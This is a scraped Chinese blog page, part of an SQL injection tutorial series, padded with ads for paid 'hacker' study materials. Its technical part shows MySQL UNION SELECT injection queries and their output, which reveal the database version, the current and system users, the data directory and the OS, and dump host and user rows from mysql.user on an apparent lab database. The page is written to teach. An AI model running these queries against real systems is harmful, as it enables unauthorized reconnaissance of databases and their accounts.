SQL注入学习之数据库信息收集(五)_sql收集用户输入信息

于 2024-05-17 08:46:14 发布
阅读量1k 收藏 10
点赞数 27
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76379776/article/details/138991370
版权

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

| 1 | admin | admin |
| 1 | 5.6.30-1 | 3 |
±-----±---------±---------+
2 rows in set (0.00 sec)

mysql> SELECT * FROM admin WHERE id = 1 union select 1,@@version,3;
±-----±---------±---------+
| id | username | password |
±-----±---------±---------+
| 1 | admin | admin |
| 1 | 5.6.30-1 | 3 |
±-----±---------±---------+
2 rows in set (0.01 sec)

mysql> SELECT * FROM admin WHERE id = 1 union select 1,/!40000 user()/,3;
±-----±---------------±---------+
| id | username | password |
±-----±---------------±---------+
| 1 | admin | admin |
| 1 | root@localhost | 3 |
±-----±---------------±---------+
2 rows in set (0.00 sec)


路径的话一般用`@@datadir`就可以了然后大概反猜下网站路径 操作系统 `@@version_compile_os`


## 0x01 用户,链接信息


`system_user()` //系统用户名  
 `user()` // 用户名  
 `current_user()` //当前用户名  
 `session_user()` //链接数据库的用户名

mysql> select * from users where id =1 union select system_user(),session_user(),current_user();
±-------------------±-------------------±---------+
| id | username | password |
±-------------------±-------------------±---------+
| 1 | Dumb | Dumb |
| root@192.168.1.101 | root@192.168.1.101 | root@% |
±-------------------±-------------------±---------+
2 rows in set (0.00 sec)


读取host与user

mysql> select * from users where id =1 union select 1,host,user from mysql.user;
±—±----------±---------+
| id | username | password |
±—±----------±---------+
| 1 | Dumb | Dumb |
| 1 | % | root |
| 1 | 127.0.0.1 | root |
| 1 | ::1 | root |
| 1 | localhost | root |
±—±----------±---------+
5 rows in set (0.00 sec)


## 0x02 文末



**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
你还有馒头吗
关注
  • 27
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
信息安全技术之SQL注入式攻击
12-17
信息安全技术之SQL注入式攻击 SQL注入式攻击是一种常见的网络攻击方式,通过将恶意的SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串中,欺骗服务器执行恶意的SQL命令。这种攻击方式可以让攻击者获得...
IDEA常用插件(30个)
大道至简
06-20 1万+
Database Navigator:提供了数据库连接和管理功能,可以直接在 IDE 中进行 SQL 开发。Docker Integration:提供了 Docker 容器的支持,可以在 IDE 中管理和调试容器。.ignore:提供了许多文件和目录忽略模板,可以帮助你在项目中快速创建 .gitignore 文件。CheckStyle-IDEA:提供了 CheckStyle 的支持,可以帮助你保持代码质量。SonarLint:提供了 SonarLint 的支持,可以帮助你在代码中发现潜在的问题。
Web漏洞-XSS平台简介-相关知识点补充(cookie与session)
ran的博客
03-14 1881
首页(注册)。成功注册后的主页。按照如下路径填写相关信息后点击下一步。之后会返回项目相关的功能。勾选默认模块后点击下一步。点击下一步后,平台会为你创建一个项目。下滑后可以看到平台生成的测试语句。这里我们引用平台生成的最后一条语句。输入网站内的对应位置后点击提交。可以看到成功提交了。来到管理员界面可以看到查看留言的位置。点击进入查看后便发现网站弹出了一个弹窗,说明网站成功执行了js代码。
Ubuntu和windows系统下安装odoo17 社区版和企业版
u010991031的博客
11-14 1万+
6.要部署企业版的,就去路径/usr/lib/python3/dist-packages 把里面的odoo文件夹改名,或者删除,然后把企业版源码(需要可以联系walle-168)粘贴进去,重启odoo服务或者重启服务器,然后退出社区版登录,点管理数据库新建数据库就是企业版的了,也可以直接http://ip:8069/web/database/manager直接新建数据库。其他的很多功能也有不错的亮点,比如筛选框、冻结表头等,最后在技术层面也是做了不少的优化,大大提高启动速度,日常应用响应速度。
IDEA常用插件介绍
宇智波小强的博客
07-17 1万+
IDEA常用插件介绍!
IDEA - 最全实用插件与使用
MinggeQingchun的博客
06-04 4733
日晒主题本身是为vim定制的。后来移植到ide 非常酷!配色非常耐看​idea设置黑色经典样式Darcula:idea设置黑色经典样式Darcula。
自动SQL注入数据库接管工具___下载.zip
04-19
自动SQL注入数据库接管工具___下载.zip
基于机器学习数据库防火墙,主要且唯一的功能是防止sql注入
11-09
基于机器学习数据库防火墙,主要且唯一的功能是防止sql注入。使用的时候将原本向mysql数据库请求的端口(默认是3306)改成防火墙的端口(默认是5000)即可。 data文件夹存放的是sql语句,用于训练模型; model...
信息安全_安全编码之SQL注入.pptx
08-14
1. 使用合理的过滤规则:对用户输入的数据进行严格的检查和清理,去除或转义可能导致SQL注入的特殊字符。 2. 尽量避免直接编写SQL语句,而是采用参数化查询或预编译语句。在PHP中,PDO(PHP Data Objects)提供了一...
JAVA获取视频缩略图
02-05
超简单 获取视频缩略图。
java利用ffmpeg获取视频缩略图
11-12
这是一个java利用ffmpeg获取视频缩略图的java工程,里面有什么都有了,你只需要导入你的myeclpise,然后运行,看效果就是了,总共就一个类,二十多行代码
httpx是一种快速且多功能的HTTP工具包,允许使用retryablehttp库运行多个探测器-Golang开发
05-26
httpx是一种快速且多功能的HTTP工具包,允许使用retryablehttp库运行多个探测器,它旨在通过增加线程数来保持结果的可靠性。 httpx是一种快速且多功能的HTTP工具包,允许使用retryablehttp库运行多个探测器,它旨在通过增加线程数来保持结果的可靠性。 资源资源功能用法安装说明从二进制文件从源文件运行httpX到探针7614主机使用stdin运行httpx并使用文件输入运行httpx并使用CIDR输入运行httpx并使用带有subfinder / chaos和任何其他类似工具的httpx。 运行带有json输出的httpX Todo谢谢
MP3STEGO.zip
09-16
  mp3stego是一个MP3隐写工具,隐写就是在把WMA压缩转换成MP3的过程中,对要隐藏的文本txt文件进行加密并写入MP3。有需要的可以下载来使用。
odoo17基础培训1-odoo开发基础知识准备以及odoo17开发环境安装
jiafeitutu的博客
01-12 4053
odoo17基础培训1-odoo开发基础知识准备以及odoo17开发环境安装
odoo17开发入门教程(2):创建一个新的模块module
03-10 1050
使用docker安装开发环境,再之前的文章中已经讲过了。下面正式进入odoo的开发之旅。本章的目的是为创建一个全新的Odoo模块奠定基础。我们将从头开始,以最小的需求让我们的模块被Odoo识别。在接下来的章节中,我们将逐步添加功能,构建一个现实的商业案例。
Nessus详细安装-windows (保姆级教程)
m0_52985087的博客
12-23 1万+
将license全部复制包括前面的-----BEGIN TENABLE LICENSE-----和最后的-----END TENABLE LICENSE----- 否则会提=提示错误。大家可以自行研究怎么扫描,可以先扫描自己的本地主机试试,我试了简单的一般20-30分钟,还可以将扫描的信息导出为pdf,非常nice。Nessus 提供了丰富的报告功能,可以生成详细的漏洞报告和安全建议,帮助管理员和安全团队理解并解决系统中存在的安全问题。在上述11步的时候提到的下载插件的地址,需要提前下载。
Java SpringBoot 读取、使用yaml文件类型的简述,和对集合list的使用解析
热门推荐
Counter-Strike大牛
08-10 1万+
基本类型的使用 yml文件大部分使用的都是字符串,如果想使用其它类型,只要直接按其它类型写变量值就可以了。 举例: #使用boolean my-switch: is-on: true Java中使用只要加上@Value就可以了: @Value("${my-switch.is-on}") private boolean switchOn; 使用其它类型也是一样的。 集...
sql server注入查询数据库
最新发布
06-04
SQL Server注入是指攻击者利用程序对输入数据没有进行充分检查过滤的漏洞,向程序中注入恶意的SQL语句,从而达到控制数据库的目的。攻击者可以通过SQL Server注入的方式获取、修改、删除数据库中的数据。 下面是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值